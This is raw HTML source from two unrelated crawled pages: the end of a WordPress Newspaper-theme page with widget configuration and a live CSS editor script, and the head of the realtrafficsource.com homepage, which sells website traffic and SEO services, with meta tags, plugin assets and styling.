text","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_weight":"","f_btn_font_transform":"","f_btn_font_spacing":"","f_btn_":"","results_bg":"","results_border_color":"","results_msg_color":"","results_msg_color_h":"","results_msg_bg":"","f_results_msg_font_header":"","f_results_msg_font_title":"Text","f_results_msg_font_settings":"","f_results_msg_font_family":"","f_results_msg_font_size":"","f_results_msg_font_line_height":"","f_results_msg_font_style":"","f_results_msg_font_weight":"","f_results_msg_font_transform":"","f_results_msg_font_spacing":"","f_results_msg_":"","m_bg":"","color_overlay":"","shadow_module_shadow_header":"","shadow_module_shadow_title":"Module Shadow","shadow_module_shadow_size":"","shadow_module_shadow_offset_horizontal":"","shadow_module_shadow_offset_vertical":"","shadow_module_shadow_spread":"","shadow_module_shadow_color":"","title_txt":"","title_txt_hover":"","cat_bg":"","cat_bg_hover":"","cat_txt":"","cat_txt_hover":"","meta_bg":"","author_txt":"","author_txt_hover":"","date_txt":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","shadow_meta_shadow_header":"","shadow_meta_shadow_title":"Meta info shadow","shadow_meta_shadow_size":"","shadow_meta_shadow_offset_horizontal":"","shadow_meta_shadow_offset_vertical":"","shadow_meta_shadow_spread":"","shadow_meta_shadow_color":"","btn_bg_hover":"","btn_txt":"","btn_txt_hover":"","btn_border_hover":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_family":"","f_title_font_size":"","f_title_font_line_height":"","f_title_font_style":"","f_title_font_weight":"","f_title_font_transform":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_family":"","f_cat_font_size":"","f_cat_font_line_height":"","f_cat_font_style":"","f_cat_font_weight":"","f_cat_font_transform":"","f_cat_font_spacing":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_family":"","f_meta_font_size":"","f_meta_font_line_height":"","f_meta_font_style":"","f_meta_font_weight":"","f_meta_font_transform":"","f_meta_font_spacing":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","el_class":"","block_template_id":"","td_column_number":1,"header_color":"","ajax_pagination_infinite_stop":"","offset":"","limit":"5","td_ajax_preloading":"","td_ajax_filter_type":"","td_filter_default_txt":"","td_ajax_filter_ids":"","color_preset":"","ajax_pagination":"","border_top":"","css":"","class":"td_uid_28_5cdd903e42ab6_rand","tdc_css_class":"td_uid_28_5cdd903e42ab6_rand","tdc_css_class_style":"td_uid_28_5cdd903e42ab6_rand_style"}'; tdbSearchItem.jqueryObj = jQuery('.td_uid_28_5cdd903e42ab6_rand'); tdbSearchItem._openSearchFormClass = 'tdb-drop-down-search-open'; tdbSearchItem._resultsLimit = '4'; tdbSearch.addItem( tdbSearchItem ); }); /* global jQuery:{} */ jQuery(window).load(function () { var tdbMenuItem = new tdbMenu.item(); tdbMenuItem.blockUid = 'td_uid_34_5cdd903e4a548'; tdbMenuItem.jqueryObj = jQuery('.td_uid_34_5cdd903e4a548_rand'); tdbMenu.addItem( tdbMenuItem ); tdbMenu.megaMenuFull( tdbMenuItem, false ); }); jQuery().ready(function () { var tdbSearchItem = new tdbSearch.item(); //block unique ID tdbSearchItem.blockUid = 'td_uid_37_5cdd903e4df3f'; tdbSearchItem.blockAtts = '{"inline":"yes","toggle_txt_pos":"after","form_align":"content-horiz-right","results_msg_align":"content-horiz-center","image_floated":"float_left","image_width":"30","image_size":"td_324x400","show_cat":"none","show_btn":"none","show_date":"","show_review":"none","show_com":"none","show_excerpt":"none","show_author":"none","meta_padding":"2px 0 0 15px","art_title":"0 0 5px","all_modules_space":"20","tdc_css":"eyJhbGwiOnsiZGlzcGxheSI6ImlubGluZS1ibG9jayJ9fQ==","float_block":"yes","icon_color":"#ffffff","icon_color_h":"#ffffff","show_form":"","separator":"","tdicon":"","icon_size":"20","icon_padding":"2.4","toggle_txt":"","toggle_txt_align":"0","toggle_txt_space":"","toggle_horiz_align":"content-horiz-left","form_offset":"","form_width":"","form_padding":"","form_border":"","input_placeholder":"","placeholder_travel":"0","input_padding":"","input_border":"","input_radius":"","btn_text":"Search","btn_tdicon":"","btn_icon_pos":"","btn_icon_size":"","btn_icon_space":"","btn_icon_align":"0","btn_margin":"","btn_padding":"","btn_border":"","btn_radius":"","results_padding":"","results_border":"","results_msg_padding":"","mc1_tl":"","mc1_el":"","results_limit":"","modules_on_row":"100%","modules_gap":"","m_padding":"","modules_divider":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_height":"","image_radius":"","hide_image":"","meta_info_align":"","meta_info_horiz":"content-horiz-left","meta_width":"","meta_margin":"","art_excerpt":"","excerpt_col":"1","excerpt_gap":"","art_btn":"","meta_info_border_size":"","meta_info_border_style":"","meta_info_border_color":"#eaeaea","modules_category":"","modules_category_margin":"","modules_category_padding":"","modules_category_radius":"0","author_photo":"","author_photo_size":"","author_photo_space":"","author_photo_radius":"","excerpt_middle":"","btn_title":"","btn_border_width":"","toggle_txt_color":"","toggle_txt_color_h":"","f_toggle_txt_font_header":"","f_toggle_txt_font_title":"Text","f_toggle_txt_font_settings":"","f_toggle_txt_font_family":"","f_toggle_txt_font_size":"","f_toggle_txt_font_line_height":"","f_toggle_txt_font_style":"","f_toggle_txt_font_weight":"","f_toggle_txt_font_transform":"","f_toggle_txt_font_spacing":"","f_toggle_txt_":"","form_bg":"","form_border_color":"","arrow_color":"","form_shadow_shadow_header":"","form_shadow_shadow_title":"Shadow","form_shadow_shadow_size":"","form_shadow_shadow_offset_horizontal":"","form_shadow_shadow_offset_vertical":"","form_shadow_shadow_spread":"","form_shadow_shadow_color":"","input_color":"","placeholder_color":"","placeholder_opacity":"0.5","input_bg":"","input_border_color":"","input_shadow_shadow_header":"","input_shadow_shadow_title":"Input shadow","input_shadow_shadow_size":"","input_shadow_shadow_offset_horizontal":"","input_shadow_shadow_offset_vertical":"","input_shadow_shadow_spread":"","input_shadow_shadow_color":"","btn_color":"","btn_color_h":"","btn_icon_color":"","btn_icon_color_h":"","btn_bg":"","btn_bg_h":"","btn_border_color":"","btn_border_color_h":"","btn_shadow_shadow_header":"","btn_shadow_shadow_title":"Button shadow","btn_shadow_shadow_size":"","btn_shadow_shadow_offset_horizontal":"","btn_shadow_shadow_offset_vertical":"","btn_shadow_shadow_spread":"","btn_shadow_shadow_color":"","f_input_font_header":"","f_input_font_title":"Input text","f_input_font_settings":"","f_input_font_family":"","f_input_font_size":"","f_input_font_line_height":"","f_input_font_style":"","f_input_font_weight":"","f_input_font_transform":"","f_input_font_spacing":"","f_input_":"","f_placeholder_font_title":"Placeholder text","f_placeholder_font_settings":"","f_placeholder_font_family":"","f_placeholder_font_size":"","f_placeholder_font_line_height":"","f_placeholder_font_style":"","f_placeholder_font_weight":"","f_placeholder_font_transform":"","f_placeholder_font_spacing":"","f_placeholder_":"","f_btn_font_title":"Button text","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_weight":"","f_btn_font_transform":"","f_btn_font_spacing":"","f_btn_":"","results_bg":"","results_border_color":"","results_msg_color":"","results_msg_color_h":"","results_msg_bg":"","f_results_msg_font_header":"","f_results_msg_font_title":"Text","f_results_msg_font_settings":"","f_results_msg_font_family":"","f_results_msg_font_size":"","f_results_msg_font_line_height":"","f_results_msg_font_style":"","f_results_msg_font_weight":"","f_results_msg_font_transform":"","f_results_msg_font_spacing":"","f_results_msg_":"","m_bg":"","color_overlay":"","shadow_module_shadow_header":"","shadow_module_shadow_title":"Module Shadow","shadow_module_shadow_size":"","shadow_module_shadow_offset_horizontal":"","shadow_module_shadow_offset_vertical":"","shadow_module_shadow_spread":"","shadow_module_shadow_color":"","title_txt":"","title_txt_hover":"","cat_bg":"","cat_bg_hover":"","cat_txt":"","cat_txt_hover":"","meta_bg":"","author_txt":"","author_txt_hover":"","date_txt":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","shadow_meta_shadow_header":"","shadow_meta_shadow_title":"Meta info shadow","shadow_meta_shadow_size":"","shadow_meta_shadow_offset_horizontal":"","shadow_meta_shadow_offset_vertical":"","shadow_meta_shadow_spread":"","shadow_meta_shadow_color":"","btn_bg_hover":"","btn_txt":"","btn_txt_hover":"","btn_border_hover":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_family":"","f_title_font_size":"","f_title_font_line_height":"","f_title_font_style":"","f_title_font_weight":"","f_title_font_transform":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_family":"","f_cat_font_size":"","f_cat_font_line_height":"","f_cat_font_style":"","f_cat_font_weight":"","f_cat_font_transform":"","f_cat_font_spacing":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_family":"","f_meta_font_size":"","f_meta_font_line_height":"","f_meta_font_style":"","f_meta_font_weight":"","f_meta_font_transform":"","f_meta_font_spacing":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","el_class":"","block_template_id":"","td_column_number":1,"header_color":"","ajax_pagination_infinite_stop":"","offset":"","limit":"5","td_ajax_preloading":"","td_ajax_filter_type":"","td_filter_default_txt":"","td_ajax_filter_ids":"","color_preset":"","ajax_pagination":"","border_top":"","css":"","class":"td_uid_37_5cdd903e4df3f_rand","tdc_css_class":"td_uid_37_5cdd903e4df3f_rand","tdc_css_class_style":"td_uid_37_5cdd903e4df3f_rand_style"}'; tdbSearchItem.jqueryObj = jQuery('.td_uid_37_5cdd903e4df3f_rand'); tdbSearchItem._openSearchFormClass = 'tdb-drop-down-search-open'; tdbSearchItem._resultsLimit = '4'; tdbSearch.addItem( tdbSearchItem ); }); (function(){ var html_jquery_obj = jQuery('html'); if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) { var path = 'https://www.socialistalternative.org/wp-content/themes/Newspaper/style.css'; jQuery.get(path, function(data) { var str_split_separator = '#td_css_split_separator'; var arr_splits = data.split(str_split_separator); var arr_length = arr_splits.length; if (arr_length > 1) { var dir_path = 'https://www.socialistalternative.org/wp-content/themes/Newspaper'; var splited_css = ''; for (var i = 0; i < arr_length; i++) { if (i > 0) { arr_splits[i] = str_split_separator + ' ' + arr_splits[i]; } //jQuery('head').append('<style>' + arr_splits[i] + '</style>'); var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) { return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,''); }); splited_css += "<style>" + formated_str + "</style>"; } var td_theme_css = jQuery('link#td-theme-css'); if (td_theme_css.length) { td_theme_css.after(splited_css); } } }); } })(); </script> <div id="tdw-css-writer" style="display: none" class="tdw-drag-dialog tdc-window-sidebar"> <header> <a title="Editor" class="tdw-tab tdc-tab-active" href="#" data-tab-content="tdw-tab-editor">Edit with Live CSS</a> <div class="tdw-less-info" title="This will be red when errors are detected in your CSS and LESS"></div> </header> <div class="tdw-content"> <div class="tdw-tabs-content tdw-tab-editor tdc-tab-content-active"> <script> (function(jQuery, undefined) { jQuery(window).ready(function() { if ( 'undefined' !== typeof tdcAdminIFrameUI ) { var $liveIframe = tdcAdminIFrameUI.getLiveIframe(); if ( $liveIframe.length ) { $liveIframe.load(function() { $liveIframe.contents().find( 'body').append( '<textarea class="tdw-css-writer-editor" style="display: none"></textarea>' ); }); } } }); })(jQuery); </script> <textarea class="tdw-css-writer-editor td_live_css_uid_1_5cdd903e666a9"></textarea> <div id="td_live_css_uid_1_5cdd903e666a9" class="td-code-editor"></div> <script> jQuery(window).load(function (){ if ( 'undefined' !== typeof tdLiveCssInject ) { tdLiveCssInject.init(); var editor_textarea = jQuery('.td_live_css_uid_1_5cdd903e666a9'); var languageTools = ace.require("ace/ext/language_tools"); var tdcCompleter = { getCompletions: function (editor, session, pos, prefix, callback) { if (prefix.length === 0) { callback(null, []); return } if ('undefined' !== typeof tdcAdminIFrameUI) { var data = { error: undefined, getShortcode: '' }; tdcIFrameData.getShortcodeFromData(data); if (!_.isUndefined(data.error)) { tdcDebug.log(data.error); } if (!_.isUndefined(data.getShortcode)) { var regex = /el_class=\"([A-Za-z0-9_-]*\s*)+\"/g, results = data.getShortcode.match(regex); var elClasses = {}; for (var i = 0; i < results.length; i++) { var currentClasses = results[i] .replace('el_class="', '') .replace('"', '') .split(' '); for (var j = 0; j < currentClasses.length; j++) { if (_.isUndefined(elClasses[currentClasses[j]])) { elClasses[currentClasses[j]] = ''; } } } var arrElClasses = []; for (var prop in elClasses) { arrElClasses.push(prop); } callback(null, arrElClasses.map(function (item) { return { name: item, value: item, meta: 'in_page' } })); } } } }; languageTools.addCompleter(tdcCompleter); window.editor = ace.edit("td_live_css_uid_1_5cdd903e666a9"); window.editor.$blockScrolling = Infinity; // 'change' handler is written as function because it's called by tdc_on_add_css_live_components (of wp_footer hook) // We did it to reattach the existing compiled css to the new content received from server. window.editorChangeHandler = function () { //tdwState.lessWasEdited = true; window.onbeforeunload = function () { if (tdwState.lessWasEdited) { return "You have attempted to leave this page. Are you sure?"; } return false; }; var editorValue = editor.getSession().getValue(); editor_textarea.val(editorValue); if ('undefined' !== typeof tdcAdminIFrameUI) { tdcAdminIFrameUI.getLiveIframe().contents().find('.tdw-css-writer-editor:first').val(editorValue); // Mark the content as modified // This is important for showing info when composer closes tdcMain.setContentModified(); } tdLiveCssInject.less(); }; editor.getSession().setValue(editor_textarea.val()); editor.getSession().on('change', editorChangeHandler); editor.setTheme("ace/theme/textmate"); editor.setShowPrintMargin(false); editor.getSession().setMode("ace/mode/less"); editor.getSession().setUseWrapMode(true); editor.setOptions({ enableBasicAutocompletion: true, enableSnippets: true, enableLiveAutocompletion: false }); } }); </script> </div> </div> <footer> <a href="#" class="tdw-save-css">Save</a> <div class="tdw-more-info-text">Write CSS OR LESS and hit save. CTRL + SPACE for auto-complete.</div> <div class="tdw-resize"></div> </footer> </div> </body> </html>
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="pingback" href="https://realtrafficsource.com/xmlrpc.php" /> <!-- Jetpack Site Verification Tags --> <meta name="google-site-verification" content="nx6rKR581_iRdTlHT0ARUoX4Fx_6PZMu_QgbFRN73vg" /> <script>window._wca = window._wca || [];</script> <!-- Mobile viewport scale --> <meta name="viewport" content="width=device-width, initial-scale=1"/> <!-- This site is optimized with the Yoast SEO plugin v11.2 - https://yoast.com/wordpress/plugins/seo/ --> <title>Buy Website Traffic | Increase Social Traffic | RealTrafficSource.com</title> <meta name="description" content="Buy website traffic now! Find cheap backlinks, social traffic and SEO services and get guaranteed targeted buyer traffic, sales, customers and leads."/> <link rel="canonical" href="https://realtrafficsource.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Buy Website Traffic | Increase Social Traffic | RealTrafficSource.com" /> <meta property="og:description" content="Buy website traffic now! Find cheap backlinks, social traffic and SEO services and get guaranteed targeted buyer traffic, sales, customers and leads." /> <meta property="og:url" content="https://realtrafficsource.com/" /> <meta property="og:site_name" content="RealTrafficSource.com" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="Buy website traffic now! Find cheap backlinks, social traffic and SEO services and get guaranteed targeted buyer traffic, sales, customers and leads." /> <meta name="twitter:title" content="Buy Website Traffic | Increase Social Traffic | RealTrafficSource.com" /> <meta name="twitter:site" content="@realtraffsource" /> <meta name="twitter:image" content="https://realtrafficsource.com/wp-content/uploads/2010/08/traffic-visitor-increase.png" /> <meta name="twitter:creator" content="@realtraffsource" /> <meta name="msvalidate.01" content="7CB214036661E3493F6BBEA4C382BCAE" /> <meta name="google-site-verification" content="google5c1c82a04a717183" /> <meta name="yandex-verification" content="7d50c5ec2de2b565" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://realtrafficsource.com/#organization","name":"Real Traffic Source","url":"https://realtrafficsource.com/","sameAs":["https://www.facebook.com/pages/RealTrafficSource/190889487638136","https://www.linkedin.com/pub/rick-hanson/40/460/125","https://www.youtube.com/user/webar2007?feature=mhee","https://twitter.com/realtraffsource"],"logo":{"@type":"ImageObject","@id":"https://realtrafficsource.com/#logo","url":"https://i0.wp.com/realtrafficsource.com/wp-content/uploads/2011/03/Real-Traffic-Source-7801.gif?fit=780%2C65&ssl=1","width":"780","height":"65","caption":"Real Traffic Source"},"image":{"@id":"https://realtrafficsource.com/#logo"}},{"@type":"WebSite","@id":"https://realtrafficsource.com/#website","url":"https://realtrafficsource.com/","name":"RealTrafficSource.com","publisher":{"@id":"https://realtrafficsource.com/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://realtrafficsource.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://realtrafficsource.com/#webpage","url":"https://realtrafficsource.com/","inLanguage":"en-US","name":"Buy Website Traffic | Increase Social Traffic | RealTrafficSource.com","isPartOf":{"@id":"https://realtrafficsource.com/#website"},"about":{"@id":"https://realtrafficsource.com/#organization"},"image":{"@type":"ImageObject","@id":"https://realtrafficsource.com/#primaryimage","url":"https://i2.wp.com/realtrafficsource.com/wp-content/uploads/2010/08/traffic-visitor-increase.png?fit=532%2C298&ssl=1","width":"532","height":"298"},"primaryImageOfPage":{"@id":"https://realtrafficsource.com/#primaryimage"},"datePublished":"2010-08-17T12:27:18+00:00","dateModified":"2019-04-05T09:04:47+00:00","description":"Buy website traffic now! Find cheap backlinks, social traffic and SEO services and get guaranteed targeted buyer traffic, sales, customers and leads."}]}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//platform.twitter.com' /> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//www.google.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="RealTrafficSource.com &raquo; Feed" href="https://realtrafficsource.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="RealTrafficSource.com &raquo; Comments Feed" href="https://realtrafficsource.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="RealTrafficSource.com &raquo; Buy Website Traffic For Less Than 1 Cent Pr View! Comments Feed" href="https://realtrafficsource.com/buy-website-traffic-less-1-cent-pr-view/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/realtrafficsource.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <style type="text/css"> @media only screen and (min-width: 980px) { body.two-col-right-1340 #main-sidebar-container { width: 100%; } body.two-col-right-1340 #main-sidebar-container #sidebar { width: 30.385%; } body.two-col-right-1340 #main-sidebar-container #main { width: 66.385%; } } </style> <style type="text/css"> </style><link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/5.2/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='wc-block-style-css' href='https://c0.wp.com/p/woocommerce/3.6.2/assets/css/blocks/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://realtrafficsource.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='cookie-notice-front-css' href='https://realtrafficsource.com/wp-content/plugins/cookie-notice/css/front.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='ctf_styles-css' href='https://realtrafficsource.com/wp-content/plugins/custom-twitter-feeds/css/ctf-styles.css?ver=1.3' type='text/css' media='all' /> <style id='woocommerce-inline-inline-css' type='text/css'> .woocommerce form .form-row .required { visibility: visible; } </style> <link rel='stylesheet' id='woo-jetpack-css' href='https://realtrafficsource.com/wp-content/themes/canvas/includes/integrations/jetpack/css/jetpack.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_facebook_likebox-css' href='https://c0.wp.com/p/jetpack/7.3.1/modules/widgets/facebook-likebox/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='theme-stylesheet-css' href='https://realtrafficsource.com/wp-content/themes/canvas/style.css?ver=5.12.0' type='text/css' media='all' /> <link rel='stylesheet' id='woocommerce-css' href='https://realtrafficsource.com/wp-content/themes/canvas/includes/integrations/woocommerce/css/woocommerce.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='sib-front-css-css' href='https://realtrafficsource.com/wp-content/plugins/mailin/css/mailin-front.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://c0.wp.com/p/jetpack/7.3.1/css/jetpack.css' type='text/css' media='all' /> <link rel='stylesheet' id='commentluv_style-css' href='https://realtrafficsource.com/wp-content/plugins/commentluv/css/commentluv.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='foobar-2-6-css' href='https://realtrafficsource.com/wp-content/plugins/foobar/css/foobar.2.6.css?ver=2.5.7' type='text/css' media='all' /> <!--[if lt IE 9]> <link href="https://realtrafficsource.com/wp-content/themes/canvas/css/non-responsive.css" rel="stylesheet" type="text/css" /> <style type="text/css">.col-full, #wrapper { width: 1340px; max-width: 1340px; } #inner-wrapper { padding: 0; } body.full-width #header, #nav-container, body.full-width #content, body.full-width #footer-widgets, body.full-width #footer { padding-left: 0; padding-right: 0; } body.fixed-mobile #top, body.fixed-mobile #header-container, body.fixed-mobile #footer-container, body.fixed-mobile #nav-container, body.fixed-mobile #footer-widgets-container { min-width: 1340px; padding: 0 1em; } body.full-width #content { width: auto; padding: 0 1em;}</style> <![endif]--> <script type='text/javascript' src='https://realtrafficsource.com/wp-content/themes/canvas/includes/tumblog/swfobject.js?ver=5.2'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var cl_settings = {"name":"author","url":"url","comment":"comment","email":"email","infopanel":null,"default_on":"on","default_on_admin":null,"cl_version":"3.0.2","images":"https:\/\/realtrafficsource.com\/wp-content\/plugins\/commentluv\/images\/","api_url":"http:\/\/realtrafficsource.com\/wp-admin\/admin-ajax.php","api_url_alt":"https:\/\/realtrafficsource.com\/wp-admin\/admin-ajax.php","_fetch":"1f55f1b65b","_info":"08c37c0c75","infoback":"white","infotext":"","template_insert":"","logged_in":"","refer":"https:\/\/realtrafficsource.com\/","no_url_message":"Please enter a URL and then click the CommentLuv checkbox if you want to add your last blog post","no_http_message":"Please use http:\/\/ in front of your url","no_url_logged_in_message":"You need to visit your profile in the dashboard and update your details with your site URL","no_info_message":"No info was available or an error occured"}; /* ]]> */ </script> <script type='text/javascript' src='https://realtrafficsource.com/wp-content/plugins/commentluv/js/commentluv.js?ver=3.0.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var cnArgs = {"ajaxurl":"https:\/\/realtrafficsource.com\/wp-admin\/admin-ajax.php","hideEffect":"fade","onScroll":"no","onScrollOffset":"100","cookieName":"cookie_notice_accepted","cookieValue":"true","cookieTime":"15811200","cookiePath":"\/","cookieDomain":"","redirection":"","cache":"1","refuse":"no","revoke_cookies":"0","revoke_cookies_opt":"automatic","secure":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://realtrafficsource.com/wp-content/plugins/cookie-notice/js/front.min.js?ver=1.2.46'></script> <script type='text/javascript' src='https://realtrafficsource.com/wp-content/plugins/foobar/js/jquery.foobar.2.4.min.js?ver=2.5.7'></script> <script type='text/javascript'> /* <![CDATA[ */ var sibErrMsg = {"invalidMail":"Please fill out valid email address","requiredField":"Please fill out required fields","invalidDateFormat":"Please fill out valid date format","invalidSMSFormat":"Please fill out valid phone number"}; var ajax_sib_front_object = {"ajax_url":"https:\/\/realtrafficsource.com\/wp-admin\/admin-ajax.php","ajax_nonce":"1f66300022","flag_url":"https:\/\/realtrafficsource.com\/wp-content\/plugins\/mailin\/img\/flags\/"}; /* ]]> */ </script> <script type='text/javascript' src='https://realtrafficsource.com/wp-content/plugins/mailin/js/mailin-front.js?ver=1555009667'></script> <script type='text/javascript' src='https://realtrafficsource.com/wp-content/themes/canvas/includes/js/third-party.min.js?ver=5.2'></script> <script type='text/javascript' src='https://realtrafficsource.com/wp-content/themes/canvas/includes/js/modernizr.min.js?ver=2.6.2'></script> <script type='text/javascript' src='https://realtrafficsource.com/wp-content/themes/canvas/includes/js/general.min.js?ver=5.2'></script> <!-- Adjust the website width --> <style type="text/css"> .col-full, #wrapper { max-width: 1340px !important; } </style> <link rel='https://api.w.org/' href='https://realtrafficsource.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://realtrafficsource.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://realtrafficsource.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <meta name="generator" content="WooCommerce 3.6.2" /> <link rel='shortlink' href='https://wp.me/P1tKAQ-e' /> <link rel="alternate" type="application/json+oembed" href="https://realtrafficsource.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Frealtrafficsource.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://realtrafficsource.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Frealtrafficsource.com%2F&#038;format=xml" /> <!-- WP Affiliate plugin v6.1.9 - https://www.tipsandtricks-hq.com/wordpress-affiliate-platform-plugin-simple-affiliate-program-for-wordpress-blogsite-1474 --> <link type="text/css" rel="stylesheet" href="https://realtrafficsource.com/wp-content/plugins/wp-affiliate-platform/affiliate_platform_style.css" /> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <link rel='dns-prefetch' href='//widgets.wp.com'/> <link rel='dns-prefetch' href='//s0.wp.com'/> <link rel='dns-prefetch' href='//0.gravatar.com'/> <link rel='dns-prefetch' href='//1.gravatar.com'/> <link rel='dns-prefetch' href='//2.gravatar.com'/> <link rel='dns-prefetch' href='//i0.wp.com'/> <link rel='dns-prefetch' href='//i1.wp.com'/> <link rel='dns-prefetch' href='//i2.wp.com'/> <link rel='dns-prefetch' href='//c0.wp.com'/> <style type='text/css'>img#wpstats{display:none}</style> <!-- Custom CSS Styling --> <style type="text/css"> #logo .site-title, #logo .site-description { display:none; } body {background-color:#ffffff;background-repeat:repeat;background-position:top left;background-attachment:scroll;border-top:4px solid #6cfa8d;} #header {background-repeat:no-repeat;background-position:left top;margin-top:1px;margin-bottom:15px;padding-top:1px;padding-bottom:1px;border:0px solid ;} #logo .site-title a {font:bold 30px/1em Helvetica Neue, Helvetica, sans-serif;color:#222222;} #logo .site-description {font:normal 13px/1em Helvetica Neue, Helvetica, sans-serif;color:#999999;} body, p { font:normal 12px/1.5em Arial, sans-serif;color:#555555; } h1 { font:bold 26px/1.2em 